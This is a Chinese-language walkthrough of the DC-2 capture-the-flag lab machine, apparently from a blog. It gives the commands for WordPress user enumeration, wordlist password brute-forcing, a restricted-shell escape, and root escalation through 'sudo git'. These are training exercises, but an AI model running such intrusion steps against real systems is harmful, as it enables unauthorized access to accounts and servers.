首页
学习
活动
专区
圈层
工具
发布

靶机渗透DC-2

DC实验室都挺好玩的,拿来玩玩,顺便记录下。

扫描存活主机。

001

nmap扫描一波。

002

再来个全端口扫描。

003

开了80和ssh端口,仍然是,首次访问先把ip加入hosts中。

004

看到了wordpress服务并看到了flag1

wordpress默认后台/wp-admin

005

需要账号密码,根据flag1提示,需要用到cewl生成密码字典。

代码语言:javascript
复制
cewl -w dc2.passwd.txt http://dc-2

006

然后wpscan扫描用户。

代码语言:javascript
复制
wpscan --url http://dc-2/ --enumerate u

007

三个用户。admin,jerry,tom

之后根据生成的密码文件和用户爆破密码。

代码语言:javascript
复制
wpscan --url http://dc-2/ -U tom -P "dc2.passwd.txt"
爆破后得到两个账号密码:
Username: tom, Password: parturient
Username: jerry, Password: adipiscing

然后再去后台登陆。

008

找到了flag2。

再用ssh登陆。

009

信息收集看看。

010

被~rbash阻挡了。

绕过它。

代码语言:javascript
复制
tom@DC-2:~$ BASH_CMDS[a]=/bin/sh;a
$ /bin/bash 
tom@DC-2:~$ ls
flag3.txt  set  usr
tom@DC-2:~$ cat flag3.txt
bash: cat: command not found

现在是bash限制了。

代码语言:javascript
复制
export PATH=$PATH:/bin/
export -p

011

指定PATH地址。

012

找到flag3。

在目录里翻翻,找到了flag4。

013

进入root目录,发现权限不够。

014

根据flag3信息,su jerry登陆jerry账户。

015

sudo -l一下,发现直接是root,不用密码。

sudo git -p help

在最下面添加!/bin/bash

提权成功

016
017

找到最终flag。

下一篇
举报
领券